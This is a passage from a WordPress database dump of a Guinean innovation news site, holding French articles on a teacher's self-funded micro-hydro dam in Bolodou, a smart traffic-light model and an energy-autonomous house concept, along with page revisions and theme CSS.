J\'ai économisé assez d\'argent pour financer mon projet qui, aujourd\'hui, profite à tous<footer>Ibrahima Tounkara, Enseignant de Mathématiques</footer></blockquote>\r\n</div>\r\n</aside>Son projet a été réalisé sur fonds propres. Les travaux lui ont couté environ 50 millions de francs guinéens (environ 3 millions de FCFA).\r\n\r\n<img class=\"alignnone size-medium wp-image-833\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/97723064_img_20170730_131943-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" />\r\n\r\n\"Quand j\'ai dit aux villageois que je comptais réaliser un mini-barrage hydroélectrique, personne ne m\'a cru. J\'ai commencé par vendre des panneaux solaires. J\'ai économisé assez d\'argent pour financer mon projet, confie-t-il.\r\n\r\nIbrahima n\'y connaissait presque rien en hydraulique. Pour réaliser son mini-barrage, il a fait des recherches essentiellement sur Google.\r\n\r\n\"Je l\'ai d\'abord fait pour ma famille. Je savais que mes parents n\'avaient pas d\'électricité chez eux et je me suis dit qu\'il fallait faire quelque chose, ne serait-ce que pour avoir de quoi charger leurs téléphones\", explique Ibrahima.\r\n\r\nAujourd\'hui, le mini-barrage de Ibrahima Tounkara illumine pas moins de 90 foyers sur environ 94 que compte le village.\r\n\r\nSelon les chiffres de la Banque mondiale, \"un Africain sur deux n\'a pas accès à l\'électricité. De plus en plus, les énergies renouvelables et mini-réseaux s\'avèrent être des pistes prometteuses, pour l\'heure insuffisantes.','Electricité: un homme construit un micro-barrage de 9KVA dans une localité de Guéckédou','','publish','open','open','','electricite-un-homme-invente-un-micro-barrage-de-9kva-dans-une-localite-de-gueckedou','','','2017-11-01 13:17:01','2017-11-01 13:17:01','',0,'https://guineeinnove.nimbasolution.com/?p=405',0,'post','',0),(407,1,'2017-10-24 13:45:12','2017-10-24 13:45:12','Ibrahima Tounkara est professeur de Mathématiques  au lycée ‘’Professeur Alpha Condé’’ de Kissidougou. Sur fonds propres, il est parvenu à réaliser un micro-barrage dans la sous-préfecture de Bolodou, située à 65km de la commune urbaine de Gueckédou.\r\n\r\nIbrahima Tounkara est professeur de Mathématiques  au lycée ‘’Professeur Alpha Condé’’ de Kissidougou. Sur fonds propres, il est parvenu à réaliser un micro-barrage dans la sous-préfecture de Bolodou, située à 65km de la commune urbaine de Gueckédou.\r\n\r\n<img class=\"size-medium wp-image-12269 alignleft td-animation-stack-type0-1\" src=\"https://guineenews.org/wp-content/uploads/2017/08/FB_IMG_14889784830648354-169x300.jpg\" sizes=\"(max-width: 169px) 100vw, 169px\" srcset=\"https://guineenews.org/wp-content/uploads/2017/08/FB_IMG_14889784830648354-169x300.jpg 169w, https://guineenews.org/wp-content/uploads/2017/08/FB_IMG_14889784830648354-575x1024.jpg 575w, https://guineenews.org/wp-content/uploads/2017/08/FB_IMG_14889784830648354-236x420.jpg 236w, https://guineenews.org/wp-content/uploads/2017/08/FB_IMG_14889784830648354.jpg 674w\" alt=\"\" width=\"169\" height=\"300\" />Interrogé par notre reporter, il a expliqué comment il a pu réaliser ce projet. « Je n’ai pas fait des années pour réaliser ce projet. C’est à partir  de l’installation des panneaux solaires que j’ai eu le goût du courant. J’ai envoyé pour mon grand frère qui résidait à Bolodou, notre village natal, un panneau solaire pour faire la charge des téléphones. Après, j’ai constaté que la consommation est très limitée. On ne peut pas encore distribuer ce courant à beaucoup de clients. Maintenant, j’ai jugé nécessaire de construire ce micro-barrage », a-t-il expliqué.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<img class=\"size-medium wp-image-12271 alignleft td-animation-stack-type0-1\" src=\"https://guineenews.org/wp-content/uploads/2017/08/IMG_20170406_181358-169x300.jpg\" sizes=\"(max-width: 169px) 100vw, 169px\" srcset=\"https://guineenews.org/wp-content/uploads/2017/08/IMG_20170406_181358-169x300.jpg 169w, https://guineenews.org/wp-content/uploads/2017/08/IMG_20170406_181358-576x1024.jpg 576w, https://guineenews.org/wp-content/uploads/2017/08/IMG_20170406_181358-236x420.jpg 236w, https://guineenews.org/wp-content/uploads/2017/08/IMG_20170406_181358.jpg 675w\" alt=\"\" width=\"169\" height=\"300\" />A propos des phases de construction de l’ouvrage, il a dit ceci : « j’ai commencé à faire des  recherches à partir du mois de mars 2016. Et j’ai terminé cette phase au mois de septembre 2016. J’ai commencé à travailler sur le site au mois de novembre. Et au mois de mai 2017, on a pu livrer le courant à la population de Bolodou. » Il a par ailleurs donné le nombre d’abonnés à ce jour et lancé un appel au gouvernement, aux ONG et aux personnes de bonne volonté. « On a plus de 80 abonnés. Vous savez, les villageois n’ont besoin que des lampes. Donc on arrive à les fournir sans problème. Notre production est de 9kVA.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<img class=\"size-medium wp-image-12272 alignleft td-animation-stack-type0-1\" src=\"https://guineenews.org/wp-content/uploads/2017/08/IMG_20170602_165256-169x300.jpg\" sizes=\"(max-width: 169px) 100vw, 169px\" srcset=\"https://guineenews.org/wp-content/uploads/2017/08/IMG_20170602_165256-169x300.jpg 169w, https://guineenews.org/wp-content/uploads/2017/08/IMG_20170602_165256-576x1024.jpg 576w, https://guineenews.org/wp-content/uploads/2017/08/IMG_20170602_165256-236x420.jpg 236w, https://guineenews.org/wp-content/uploads/2017/08/IMG_20170602_165256.jpg 675w\" alt=\"\" width=\"169\" height=\"300\" />Je sollicite auprès du gouvernement, des ONG et des personnes de bonne volonté  un soutien dans cette action. J’ai réalisé ce travail avec de petits moyens. Je n’avais pas de moyens pour acheter des tuyaux de pression et j’ai fait la conduite d’eau avec du béton armé. La conduite forcée n’est pas si résistante et je vois même des erreurs actuellement. Chaque fois, je suis obligé de colmater et la production du courant ne doit pas dépasser les 9 KVA», a-t-il plaidé. Il demande au gouvernement  de l’aider  à étendre ses actions à d’autres Communes rurales de Guinée, parce que la population a besoin du courant pour travailler et s’épanouir.','Electricité: un homme invente un micro-barrage de 9KVA dans une localité de Guéckédou','','inherit','closed','closed','','405-revision-v1','','','2017-10-24 13:45:12','2017-10-24 13:45:12','',405,'https://guineeinnove.nimbasolution.com/2017/10/24/405-revision-v1/',0,'revision','',0),(408,1,'2017-10-24 13:45:46','2017-10-24 13:45:46','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 13:45:46','2017-10-24 13:45:46','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(409,1,'2017-10-24 14:14:31','2017-10-24 14:14:31','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 14:14:31','2017-10-24 14:14:31','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(410,1,'2017-10-24 14:15:29','2017-10-24 14:15:29','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 14:15:29','2017-10-24 14:15:29','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(411,1,'2017-10-24 14:24:38','2017-10-24 14:24:38','Diallo Thierno Mamadou Djan, concepteur d\'une maquette, d\'un feu de croisement intelligent est reçu par le DG de l\' Agence de Promotion des Investissements Privés.\r\n\r\n<img class=\"alignnone size-full wp-image-829\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/feu.jpg\" alt=\"\" width=\"290\" height=\"174\" />','Diallo Thierno Mamadou Djan, concepteur d\'une maquette, d\'un feu de croisement intelligent','','publish','open','open','','diallo-thierno-mamadou-djan-concepteur-dune-maquette-dun-feu-de-croisement-intelligent','','','2017-11-01 16:04:51','2017-11-01 16:04:51','',0,'https://guineeinnove.nimbasolution.com/?p=411',0,'post','',0),(413,1,'2017-10-24 14:24:38','2017-10-24 14:24:38','Diallo Thierno Mamadou Djan, concepteur d\'une maquette, d\'un feu de croisement intelligent est reçu par le DG de l\' Agence de Promotion des Investissements Privés','Diallo Thierno Mamadou Djan, concepteur d\'une maquette, d\'un feu de croisement intelligent','','inherit','closed','closed','','411-revision-v1','','','2017-10-24 14:24:38','2017-10-24 14:24:38','',411,'https://guineeinnove.nimbasolution.com/2017/10/24/411-revision-v1/',0,'revision','',0),(414,1,'2017-10-24 14:27:01','2017-10-24 14:27:01','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 14:27:01','2017-10-24 14:27:01','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(415,1,'2017-10-24 14:30:59','2017-10-24 14:30:59','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 14:30:59','2017-10-24 14:30:59','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(416,1,'2017-10-24 14:36:41','2017-10-24 14:36:41','&nbsp;\r\n\r\nMoustapha Haidara est un jeune architecte Guinéen, considéré par ses pairs comme le meilleur de tous. Il a crée un concept de maison particulièrement innovant ayant des caractéristiques particulière:\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-768x432.jpg\" sizes=\"(max-width: 768px) 100vw, 768px\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte.jpg 960w\" alt=\"\" width=\"768\" height=\"432\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-768x432.jpg\" sizes=\"(max-width: 768px) 100vw, 768px\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4.jpg 960w\" alt=\"\" width=\"768\" height=\"432\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg\" sizes=\"(max-width: 366px) 100vw, 366px\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg 366w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3-300x169.jpg 300w\" alt=\"\" width=\"366\" height=\"206\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-768x432.jpg\" sizes=\"(max-width: 768px) 100vw, 768px\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2.jpg 960w\" alt=\"\" width=\"768\" height=\"432\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-768x432.jpg\" sizes=\"(max-width: 768px) 100vw, 768px\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6.jpg 960w\" alt=\"\" width=\"768\" height=\"432\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-768x432.jpg\" sizes=\"(max-width: 768px) 100vw, 768px\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1.jpg 960w\" alt=\"\" width=\"768\" height=\"432\" /></a></figure>\r\n-<strong>Toit en bois:</strong> avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'énergie d\'origine éolienne pour la maison.\r\n\r\n-<strong>Triple vitrage: </strong>rempli d\'argon de gaz très isolent et des capteurs solaires permettant ainsi à la maison d\'avoir une seconde source d’énergie en plus de l’énergie d\'origine éolienne.\r\n\r\n<strong>-Mur en lambris de bois: </strong>le bois économise de l’énergie, c\'est un excellent isolant.\r\n\r\n<strong>-Mur en lambris de bois:  </strong>économise de l’énergie et conserve la fraîcheur.\r\n\r\n<strong>-Végétation persistante:</strong> Afin d\'éviter les déperditions dues au vent.','Un architecte Guinéen crée un concept de maison autonome en Energie!','','publish','open','open','','un-architecte-guineen-cree-un-concept-de-maison-autonome-en-energie','','','2017-10-31 15:39:03','2017-10-31 15:39:03','',0,'https://guineeinnove.nimbasolution.com/?p=416',0,'post','',1),(418,1,'2017-10-24 14:36:41','2017-10-24 14:36:41','','Un architecte Guinéen crée un concept de maison autonome en Energie!','','inherit','closed','closed','','416-revision-v1','','','2017-10-24 14:36:41','2017-10-24 14:36:41','',416,'https://guineeinnove.nimbasolution.com/2017/10/24/416-revision-v1/',0,'revision','',0),(419,1,'2017-10-24 14:37:40','2017-10-24 14:37:40','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 14:37:40','2017-10-24 14:37:40','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(429,1,'2017-10-24 19:31:47','2017-10-24 19:31:47','#header .logo-image, #header .logo-title {\n    padding-top: 0px;\n}\n.page-title-wrap h3 {\n    margin-bottom: 0;\n    margin-top: 10px;\n}\n.page-title {\n    background-color: #ffffff;\n    padding: 0px 0;\n}\n.wrapper-space {\n    padding: 0px 0;\n}\n.logo {\n	height: 0px;\n}\n','magzma','','publish','closed','closed','','magzma','','','2017-11-07 15:30:00','2017-11-07 15:30:00','',0,'https://guineeinnove.nimbasolution.com/2017/10/24/magzma/',0,'custom_css','',0),(430,1,'2017-10-24 19:31:47','2017-10-24 19:31:47','#header .logo-image, #header .logo-title {\n    padding-top: 0px;\n}','magzma','','inherit','closed','closed','','429-revision-v1','','','2017-10-24 19:31:47','2017-10-24 19:31:47','',429,'https://guineeinnove.nimbasolution.com/2017/10/24/429-revision-v1/',0,'revision','',0),(433,1,'2017-10-24 20:42:54','2017-10-24 20:42:54','\n			<h2>Technlogie</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 20:42:54','2017-10-24 20:42:54','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(434,1,'2017-10-24 20:44:00','2017-10-24 20:44:00','\n			<h2>Technlogie</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 20:44:00','2017-10-24 20:44:00','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(435,1,'2017-10-24 20:45:25','2017-10-24 20:45:25','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 20:45:25','2017-10-24 20:45:25','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(436,1,'2017-10-24 20:47:18','2017-10-24 20:47:18','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 20:47:18','2017-10-24 20:47:18','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(437,1,'2017-10-24 22:11:33','2017-10-24 22:11:33','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 22:11:33','2017-10-24 22:11:33','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(438,1,'2017-10-24 22:12:37','2017-10-24 22:12:37','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 22:12:37','2017-10-24 22:12:37','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(439,1,'2017-10-24 22:13:48','2017-10-24 22:13:48','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 22:13:48','2017-10-24 22:13:48','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(440,1,'2017-10-24 23:45:41','2017-10-24 23:45:41','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 23:45:41','2017-10-24 23:45:41','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(441,1,'2017-10-25 00:35:26','2017-10-25 00:35:26','','TECHNOLOGIE','','inherit','closed','closed','','2-revision-v1','','','2017-10-25 00:35:26','2017-10-25 00:35:26','',2,'https://guineeinnove.nimbasolution.com/2017/10/25/2-revision-v1/',0,'revision','',0),(442,1,'2017-10-25 00:37:04','2017-10-25 00:37:04','','TECHNOLOGIE','','inherit','closed','closed','','2-revision-v1','','','2017-10-25 00:37:04','2017-10-25 00:37:04','',2,'https://guineeinnove.nimbasolution.com/2017/10/25/2-revision-v1/',0,'revision','',0),(444,1,'2017-10-25 00:49:59','2017-10-25 00:49:59','','AGRICULTURE','','inherit','closed','closed','','378-revision-v1','','','2017-10-25 00:49:59','2017-10-25 00:49:59','',378,'https://guineeinnove.nimbasolution.com/2017/10/25/378-revision-v1/',0,'revision','',0),(445,1,'2017-10-25 00:52:26','2017-10-25 00:52:26','','AGRICULTURE','','inherit','closed','closed','','378-revision-v1','','','2017-10-25 00:52:26','2017-10-25 00:52:26','',378,'https://guineeinnove.nimbasolution.com/2017/10/25/378-revision-v1/',0,'revision','',0),(446,1,'2017-10-25 00:55:10','2017-10-25 00:55:10','','AGRICULTURE','','inherit','closed','closed','','378-revision-v1','','','2017-10-25 00:55:10','2017-10-25 00:55:10','',378,'https://guineeinnove.nimbasolution.com/2017/10/25/378-revision-v1/',0,'revision','',0),(447,1,'2017-10-25 00:57:00','2017-10-25 00:57:00','','AGRICULTURE','','inherit','closed','closed','','378-revision-v1','','','2017-10-25 00:57:00','2017-10-25 00:57:00','',378,'https://guineeinnove.nimbasolution.com/2017/10/25/378-revision-v1/',0,'revision','',0),(448,1,'2017-10-25 00:57:16','2017-10-25 00:57:16','','AGRICULTURE','','inherit','closed','closed','','378-revision-v1','','','2017-10-25 00:57:16','2017-10-25 00:57:16','',378,'https://guineeinnove.nimbasolution.com/2017/10/25/378-revision-v1/',0,'revision','',0),(449,1,'2017-10-25 01:03:43','2017-10-25 01:03:43','','AGRICULTURE','','inherit','closed','closed','','378-revision-v1','','','2017-10-25 01:03:43','2017-10-25 01:03:43','',378,'https://guineeinnove.nimbasolution.com/2017/10/25/378-revision-v1/',0,'revision','',0),(450,1,'2017-10-25 01:05:52','2017-10-25 01:05:52','','AGRICULTURE','','inherit','closed','closed','','378-revision-v1','','','2017-10-25 01:05:52','2017-10-25 01:05:52','',378,'https://guineeinnove.nimbasolution.com/2017/10/25/378-revision-v1/',0,'revision','',0),(451,1,'2017-10-25 01:08:30','2017-10-25 01:08:30','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:08:30','2017-10-25 01:08:30','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(452,1,'2017-10-25 01:09:02','2017-10-25 01:09:02','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:09:02','2017-10-25 01:09:02','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(453,1,'2017-10-25 01:09:33','2017-10-25 01:09:33','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:09:33','2017-10-25 01:09:33','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(454,1,'2017-10-25 01:11:17','2017-10-25 01:11:17','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:11:17','2017-10-25 01:11:17','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(455,1,'2017-10-25 01:13:45','2017-10-25 01:13:45','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:13:45','2017-10-25 01:13:45','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(456,1,'2017-10-25 01:17:13','2017-10-25 01:17:13','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:17:13','2017-10-25 01:17:13','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(457,1,'2017-10-25 01:18:29','2017-10-25 01:18:29','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:18:29','2017-10-25 01:18:29','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(458,1,'2017-10-25 01:18:47','2017-10-25 01:18:47','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:18:47','2017-10-25 01:18:47','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(459,1,'2017-10-25 01:32:28','2017-10-25 01:32:28','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:32:28','2017-10-25 01:32:28','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(460,1,'2017-10-25 01:33:41','2017-10-25 01:33:41','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:33:41','2017-10-25 01:33:41','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(461,1,'2017-10-25 01:35:05','2017-10-25 01:35:05','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:35:05','2017-10-25 01:35:05','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(462,1,'2017-10-25 06:05:03','2017-10-25 06:05:03','https://www.youtube.com/watch?v=qV8zMH-qeBc		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:05:03','2017-10-25 06:05:03','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(463,1,'2017-10-25 06:08:53','2017-10-25 06:08:53','https://www.youtube.com/watch?v=qV8zMH-qeBc','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:08:53','2017-10-25 06:08:53','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(464,1,'2017-10-25 06:10:16','2017-10-25 06:10:16','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:10:16','2017-10-25 06:10:16','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(465,1,'2017-10-25 06:25:22','2017-10-25 06:25:22','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:25:22','2017-10-25 06:25:22','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(467,1,'2017-10-25 06:28:48','2017-10-25 06:28:48','#header .logo-image, #header .logo-title {\n    padding-top: 0px;\n}\n.page-title-wrap h3 {\n    margin-bottom: 0;\n    margin-top: 10px;\n}\n\n','magzma','','inherit','closed','closed','','429-revision-v1','','','2017-10-25 06:28:48','2017-10-25 06:28:48','',429,'https://guineeinnove.nimbasolution.com/2017/10/25/429-revision-v1/',0,'revision','',0),(469,1,'2017-10-25 06:30:05','2017-10-25 06:30:05','#header .logo-image, #header .logo-title {\n    padding-top: 0px;\n}\n.page-title-wrap h3 {\n    margin-bottom: 0;\n    margin-top: 10px;\n}\n.page-title {\n    background-color: #ffffff;\n    padding: 0px 0;\n}\n\n','magzma','','inherit','closed','closed','','429-revision-v1','','','2017-10-25 06:30:05','2017-10-25 06:30:05','',429,'https://guineeinnove.nimbasolution.com/2017/10/25/429-revision-v1/',0,'revision','',0),(471,1,'2017-10-25 06:32:32','2017-10-25 06:32:32','#header .logo-image, #header .logo-title {\n    padding-top: 0px;\n}\n.page-title-wrap h3 {\n    margin-bottom: 0;\n    margin-top: 10px;\n}\n.page-title {\n    background-color: #ffffff;\n    padding: 0px 0;\n}\n.wrapper-space {\n    padding: 0px 0;\n}\n\n','magzma','','inherit','closed','closed','','429-revision-v1','','','2017-10-25 06:32:32','2017-10-25 06:32:32','',429,'https://guineeinnove.nimbasolution.com/2017/10/25/429-revision-v1/',0,'revision','',0),(472,1,'2017-10-25 06:41:18','2017-10-25 06:41:18','\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:41:18','2017-10-25 06:41:18','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(473,1,'2017-10-25 06:42:32','2017-10-25 06:42:32','\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:42:32','2017-10-25 06:42:32','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(474,1,'2017-10-25 06:43:34','2017-10-25 06:43:34','\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:43:34','2017-10-25 06:43:34','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(475,1,'2017-10-25 06:44:11','2017-10-25 06:44:11','\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:44:11','2017-10-25 06:44:11','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(476,1,'2017-10-25 06:45:06','2017-10-25 06:45:06','\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:45:06','2017-10-25 06:45:06','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(477,1,'2017-10-25 06:46:23','2017-10-25 06:46:23','\n			<h3>Populaires</h3>		\n			<h3>Populaires</h3>		\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:46:23','2017-10-25 06:46:23','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(478,1,'2017-10-25 06:49:17','2017-10-25 06:49:17','\n			<h3>Populaires</h3>		\n		https://www.youtube.com/watch?v=9uOETcuFjbE		\n			<h3>Populaires</h3>		\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:49:17','2017-10-25 06:49:17','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(479,1,'2017-10-25 06:58:55','2017-10-25 06:58:55','\n			<h3>Populaires</h3>		\n			<h3>Populaires</h3>		\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:58:55','2017-10-25 06:58:55','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(480,1,'2017-10-25 06:59:57','2017-10-25 06:59:57','\n			<h3>Populaires</h3>		\n			<h3>Populaires</h3>		\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:59:57','2017-10-25 